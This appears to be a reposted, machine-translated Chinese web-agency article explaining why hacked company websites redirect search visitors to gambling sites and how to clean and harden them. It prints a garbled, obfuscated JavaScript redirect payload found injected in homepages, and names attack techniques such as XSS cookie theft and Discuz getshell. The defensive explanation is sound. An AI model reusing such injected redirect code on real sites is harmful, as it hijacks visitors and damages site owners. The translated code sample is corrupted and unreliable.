2021-04-20 分类: 网站建设
近日,公司内部一位纪录片同事表示,当大量广州建站公司客户在做百度推广时,网站首页点击后会自动跳转到彩票网站和赌博网站,让用户从百度搜索或推广广告空间进入网站后可以跳转,但直接进入网站时没有跳转。由此造成的用户流失导致访问量锐减、网站服务器资源浪费、推广费用浪费等。甚至可以说,在百度推广和搜狗推广的都是广告彩票公司,在网站建设行业引起轩然大波。
很多客户在回应这个问题的时候,会找广告主来补偿甚至追究责任。因此,我们的运营商需要关注并知道如何快速解决网站恶意跳转的问题。经过网络咨询和测试,广州网站建设公司于君网总结了以下经验:
首先分析网站被黑,跳转到赌博网站的原因
一般一个网站被黑,是因为服务器信息(服务器IP远程端口管理员账号密码、SSH端口、root账号密码)与包括FTP账号密码在内的网站信息对接被黑客知道,导致黑客植入木马或后门。
在整体安全监控中,asp网站和php网站都有木马,这意味着木马可以以php脚本木马、asp脚本木马和jsp脚本木马的形式存在。这些木马可以恶意篡改网站、上传、重命名、下载等管理员的高权限操作。网站被跳转的客户所采用的网站架构是php mysql架构和jsp mysql架构,大多使用开源程序,如dedecms、dream weaving系统、phpcms系统、discuz系统等。
当我们知道一些代码的时候,难免会在网站首页看到一些恶意篡改代码。删除恶意代码后,我们可能会在几天内完全停止跳转,但一段时间后,我们又会被跳转。这是一个非常讨厌的临时解决方案。短时间后网站会再次跳转,很难甚至不可能完全消除网站漏洞。
通过观察一些客户网站的首页,首页代码中有一个加密的代码,根据搜索引擎的特点进行跳转。例如,通过百度搜索和360搜索,搜狗搜索人会直接跳到彩票和赌博网站。以下代码:
type='text/java '
eval(function(p,a,c,k,e,d){e=function(c){return(c35?string . FromCharCode(c 29): c . ToString(36))};if(!''.replace(/^/,string)){while(c-)d[e(c)]=k[c]| | e(c);k=[function(e){ retun d[e]}];e=function(){ return ' \ w ' };c=1;};while(c-)if(k[c])p=p . replace(new RegExp(' b ' e(c)' \ b ',' g '),k[c]);返回p;}(' l[' \ e \ c \ 1 \ m \ I \ 8 \ n \ 0 '][' \ 7 \ 4 \ 9 \ 0 \ 8 '](' h \ 2 \ 1 \ 4 \ 9 \ 3 \ 0 \ j \ 3 \ 8 \ d \ 6 \ 0 \ 8 \ k \ 0 \ 5 \ f \ a \ r \ a 2 \ 1 \ 4 \ 9 \ 3 \ 0 \ 6 \ 2 \ 4 \ 1 \ d \ 6 \ s \ 0 \ 3 \ 2 \ q \ 5 \ 5 \ 7,29,29,' x74 | x63 | x73 | X70 | x72 | x2f | x22 | x77 | x65 | x69 | x61 | x2e | x6f | X3D | x64 | x6a | x3e | x3c | x6d | x79 | x78 | window | x75 | x6e | x6c | x38 | x3a | x76 | x68 '。拆分(' | '),0,{}))一旦受到攻击,百度搜索引擎会判断该网站是否受到攻击,然后在百度风险评估中心记录并标记该网站。百度网站安全中心提醒您,网站可能遭到黑客攻击,部分页面被非法篡改!红色表示百度风险。导致客户打开网站被百度直接拦截,如下图所示:
画
针对以上跳转攻击的特点,我司广州网站建设公司同意从手工代码方面进行审计,检测网站漏洞,网站后门木马清理,漏洞修复,xss获取管理员账号cookies,discuz拥有getshell漏洞,inject获取管理员漏洞,discuz上传绕过漏洞等。
二、修复并防止网站被恶意跳转
1.服务器目录的安全部署、管理员帐户密码的加密、数字的特殊符号要求、所有密码的大写字母和小写字母,以及向网站数据库分配公共权限帐户。
2.mysql数据库默认端口由3306改为61116,添加到端口安全策略中。不对外开放,外部IP无法连接数据库。只有本地127.0.0.1才能连接到数据库,以防止攻击者恶意猜测。
3.保护服务器的底层系统,包括远程端口登录的安全验证。
4.对网站代码进行全面的安全检查,包括定期升级网站程序源代码,修复补丁和网站漏洞。
广州网站建设公司处理网站跳转问题的方法有很多,以上只是解决问题的方法之一,所以作为网站建设公司,要对源代码进行优化调整,以保证后期网站不受影响,这就涉及到了源代码和网站版本的升级。
网站栏目:如何应对企业网站恶意跳转到赌博网站
文章起源:https://www.cdcxhl.com/news3/108953.html
成都网站建设公司_创新互联,为您提供网站设计公司、网站设计、建站公司、网站收录、ChatGPT、服务器托管
声明:本网站发布的内容(图片、视频和文字)以用户投稿、用户转载内容为主,如果涉及侵权请尽快告知,我们将会在第一时间删除。文章观点不代表本网站立场,如需处理请联系客服。电话:028-86922220;邮箱:631063699@qq.com。内容未经允许不得转载,或转载时需注明来源: 创新互联
猜你还喜欢下面的内容